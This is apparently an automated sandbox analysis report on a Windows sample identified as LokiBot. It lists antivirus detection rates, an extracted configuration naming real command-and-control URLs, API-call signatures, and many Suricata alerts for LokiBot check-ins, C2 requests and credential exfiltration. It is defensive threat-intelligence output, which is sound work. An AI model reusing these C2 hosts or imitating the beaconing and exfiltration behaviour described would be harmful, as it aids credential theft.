2025-02-20T03:45:17.298173+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50067	104.21.64.1	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://touxzw.ir/sccc/five/fre.php

Avira URL Cloud: Label: malware

Found malware configuration

Source: 1.2.svchost.exe.400000.0.unpack

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Multi AV Scanner detection for submitted file

Source: vsf098633534.exe	Virustotal: Detection: 30%			Perma Link
Source: vsf098633534.exe	ReversingLabs: Detection: 28%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: vsf098633534.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: wntdll.pdbUGP source: vsf098633534.exe, 00000000.00000003.1674953107.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, vsf098633534.exe, 00000000.00000003.1674472374.0000000003620000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: vsf098633534.exe, 00000000.00000003.1674953107.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, vsf098633534.exe, 00000000.00000003.1674472374.0000000003620000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: svchost.exe, svchost.exe, 00000001.00000002.2918187472.0000000000D91000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: svchost.pdbUGP source: svchost.exe, 00000001.00000002.2918187472.0000000000D91000.00000020.00000001.01000000.00000005.sdmp

Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B4445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00B4445A
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B4C6D1 FindFirstFileW,FindClose,	0_2_00B4C6D1
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B4C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00B4C75C
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B4EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00B4EF95
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B4F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00B4F0F2
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B4F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00B4F3F3
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B437EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00B437EF
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B43B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00B43B12
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B4BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00B4BCBC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,	1_2_00403D74

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49763 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49763 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49733 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49763 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49733 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49733 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49748 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49748 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49748 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49754 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49754 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49754 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49754 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49736 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49736 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49737 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49737 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49736 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49737 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49753 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49753 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49753 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49764 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49764 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49750 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49764 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49750 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49749 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49732 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49750 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49732 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49733 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49749 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49749 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49819 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49819 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49819 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49764 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49732 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49749 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49819 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49756 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49756 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49756 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49760 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49747 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49760 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49760 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49751 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49747 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49751 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49756 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49747 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49760 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49751 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49731 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49731 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49738 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49731 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49738 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49747 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49738 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49751 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49731 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49738 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49749
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49760
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49754
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49757 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49745 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49757 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49757 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49745 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49745 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49779 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49757 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49779 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49868 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49779 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49868 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49868 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49745 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49733
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49737 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49753 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49779 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49868 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49763 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49751
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49752 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49752 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49752 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49757
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49752 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49868
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49750 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49732 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49761 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49761 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49761 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49741 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49748 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49741 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49734 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49741 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49736 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49908 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49734 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49908 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49734 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49735 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49908 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49735 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49735 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49761 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49741 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49734 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49908 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49735 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49755 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49934 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49755 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49755 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49946 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49946 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49946 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49922 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49922 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49934 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49922 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49934 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49755 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49752
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49779
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49761
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49934 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49745
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49763
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49737
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49806 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49806 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49806 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49946 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49908
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49793 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49793 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49735
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49762 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49762 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49762 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49734
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49829 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49829 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49762 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49793 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49922 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49854 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49854 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49793 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49768 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49854 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49768 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49768 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49806 -> 104.21.64.1:80
